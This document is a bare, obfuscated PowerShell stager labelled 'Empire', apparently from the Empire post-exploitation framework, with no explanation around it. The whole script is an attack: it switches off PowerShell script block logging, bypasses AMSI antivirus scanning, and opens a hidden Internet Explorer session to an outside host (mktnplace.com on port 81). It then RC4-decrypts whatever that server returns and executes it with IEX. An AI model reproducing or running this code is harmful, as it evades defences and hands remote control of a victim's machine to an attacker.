Empire

1. If($PSVerSionTAbLe.PSVERSIOn.MAJoR -gE 3){$GPS=[rEf].ASsemBlY.GETTYpe('System.Management.Automation.Utils')."GEtFie`lD"('cachedGroupPolicySettings','N'+'onPublic,Static').GetVaLuE($NUlL);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}Else{[SCriptBlOCk]."GEtFIE`lD"('signatures','N'+'onPublic,Static').SEtVaLUE($nulL,(NeW-OBjECt COllECTiONS.GENEric.HAsHSeT[stRinG]))}[Ref].AssEmBly.GEtTYpE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SetVaLUe($nulL,$True)};};[SYSTEM.NET.SErviCEPointMaNager]::EXPEcT100COntINuE=0;$K=[SYSTeM.TeXT.ENCoDinG]::ASCII.GeTBYTEs('m3CoQRUzPVH_)i46lZ?grYT>(t:{M|d!');$R={$D,$K=$ARgs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;$ser='http://www.mktnplace.com:81';$t='/promo/tickets.asp';$ie.navigate2($ser+$t,$fl,0,$Null,'CF-RAY: jrbjR/bG74RwkQLw0YI/oTXdgVA=');while($ie.busy){Start-Sleep -Milliseconds 100};$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null}$Iv=$dAtA[0..3];$DATa=$dATA[4..$dAta.LeNgTh];-jOIN[CHAr[]](& $R $DAtA ($IV+$K))|IEX